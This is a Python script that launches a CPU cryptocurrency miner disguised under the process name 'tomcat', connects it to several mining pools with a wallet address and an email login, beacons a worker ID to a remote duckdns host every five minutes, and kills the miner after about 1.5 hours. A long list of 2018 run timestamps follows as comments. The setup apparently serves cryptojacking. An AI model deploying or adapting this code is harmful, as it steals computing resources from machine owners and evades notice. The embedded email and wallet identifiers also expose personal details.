import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:35:05.562173
#2018-02-17 16:21:06.056312
#2018-02-17 18:09:02.066895
#2018-02-17 19:56:04.183341
#2018-02-17 21:44:04.226732
#2018-02-17 23:28:05.279259
#2018-02-18 01:18:05.406215
#2018-02-18 03:05:09.386357
#2018-02-18 04:53:01.544759
#2018-02-18 06:44:05.079588
#2018-02-18 08:32:06.318017
#2018-02-18 10:19:02.199085
#2018-02-18 12:05:07.575210
#2018-02-18 13:50:04.465218
#2018-02-18 15:40:01.351372
#2018-02-18 17:28:05.519125
#2018-02-18 19:16:06.135483
#2018-02-18 21:02:06.702790
#2018-02-18 22:48:05.486540
#2018-02-19 00:37:03.895422
#2018-02-19 02:23:01.262870
#2018-02-19 04:10:06.579239
#2018-02-19 05:54:03.604734
#2018-02-19 07:44:05.721885
#2018-02-19 09:33:05.624426
#2018-02-19 11:24:01.376369
#2018-02-19 13:10:10.261451
#2018-02-19 14:59:05.706396
#2018-02-19 16:47:08.192564
#2018-02-19 18:35:05.444454
#2018-02-19 20:22:05.728949
#2018-02-19 22:10:01.780273
#2018-02-19 23:55:02.058992
#2018-02-20 01:41:08.509376
#2018-02-20 03:29:04.504915
#2018-02-20 05:16:01.339700
#2018-02-20 06:58:06.624780
#2018-02-20 08:45:01.458822
#2018-02-20 10:29:01.880579
#2018-02-20 12:13:08.264765
#2018-02-20 14:00:13.238310
#2018-02-20 15:43:05.375206
#2018-02-20 17:28:08.662486
#2018-02-20 19:17:01.639051
#2018-02-20 21:05:02.878730
#2018-02-20 22:49:03.890651
#2018-02-21 00:31:04.587334
#2018-02-21 02:16:02.281773
#2018-02-21 04:03:04.663485
#2018-02-21 05:50:09.365928
#2018-02-21 07:38:07.164289
#2018-02-21 09:23:06.448668
#2018-02-21 11:12:04.384874
#2018-02-21 13:00:01.826899
#2018-02-21 14:47:06.096138
#2018-02-21 16:36:04.777782
#2018-02-21 18:27:01.895040
#2018-02-21 20:12:05.936355
#2018-02-21 21:59:08.721092
#2018-02-21 23:46:07.397410
#2018-02-22 01:37:04.963840
#2018-02-22 03:26:05.048858
#2018-02-22 05:13:03.653248
#2018-02-22 06:57:07.415027
#2018-02-22 08:44:07.417399
#2018-02-22 10:33:08.198915
#2018-02-22 12:19:07.026608
#2018-02-22 14:03:01.839043
#2018-02-22 15:49:07.664387
#2018-02-22 17:37:09.185164
#2018-02-22 19:23:01.877115
#2018-02-22 21:15:11.339420
#2018-02-22 22:59:06.612150
#2018-02-23 00:45:10.661258
#2018-02-23 02:35:02.808029
#2018-02-23 04:22:06.303557
#2018-02-23 06:09:05.788017
#2018-02-23 07:54:08.074554
#2018-02-23 10:10:09.549918
#2018-02-23 11:58:09.620100
#2018-02-23 13:48:05.839043
#2018-02-23 15:38:04.838498
#2018-02-23 17:26:01.320119
#2018-02-23 19:04:09.166953
#2018-02-23 20:39:04.861661
#2018-02-23 22:14:07.149516
#2018-02-23 23:47:02.002736
#2018-02-24 01:21:07.293216
#2018-02-24 02:57:05.464192
#2018-02-24 04:34:06.105349
#2018-02-24 06:03:03.594591
#2018-02-24 07:40:09.247798
#2018-02-24 09:13:04.459765
#2018-02-24 10:37:01.472965
#2018-02-24 12:23:07.419061
#2018-02-24 13:57:07.218527
#2018-02-24 15:30:04.307652
#2018-02-24 17:06:01.755527
#2018-02-24 18:38:04.785662
#2018-02-24 20:09:06.122748
#2018-02-24 21:39:03.642748
#2018-02-25 01:57:03.892991
#2018-02-25 05:47:04.578619
#2018-02-25 11:37:07.942942